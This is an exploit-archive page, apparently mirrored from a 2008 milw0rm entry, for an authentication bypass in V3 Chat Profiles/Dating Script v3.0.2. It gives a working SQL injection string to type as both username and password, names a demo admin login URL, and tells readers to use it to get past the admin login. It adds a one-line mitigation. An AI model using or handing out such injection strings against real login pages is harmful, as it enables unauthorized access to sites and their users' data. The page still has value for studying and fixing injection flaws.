header-logo
Suggest Exploit
vendor:
Profiles/Dating Script
by:
d3b4g
7.5
CVSS
HIGH
Authentication Bypass
N/A
CWE
Product Name: Profiles/Dating Script
Affected Version From: V3 Chat - Profiles/Dating Script v3.0.2
Affected Version To: V3 Chat - Profiles/Dating Script v3.0.2
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

V3 Chat – Profiles/Dating Script v3.0.2 Auth Bypass Vulnerability

Using the username ' or ' 1=1 and password ' or ' 1=1, an attacker can bypass the authentication of the V3 Chat - Profiles/Dating Script v3.0.2.

Mitigation:

Ensure that authentication is properly implemented and that user input is properly sanitized.
Source

Exploit-DB raw data:

[~] V3 Chat - Profiles/Dating Script v3.0.2 Auth Bypass Vulnerability
[~]
[~] -----------------------------------------------------------------
[~] Discovered By: d3b4g
[~]
[~] contact: bl4ckend[at]gmail[dot]com  
[~] 
[~] Risk: High

 ---------------------------------------------------------------------

Exploit: USe this information to bypass admin login

username: ' or ' 1=1

password: ' or ' 1=1
-----------------------------------------------------------------------

Demo: http://v3chat.com/v3profiles/admin/



[~]----------------------------------------------------------------------
[~] Greetz tO: All fu3k3rz

# milw0rm.com [2008-11-08]

Navigation

Suggest Exploit

Services By CQR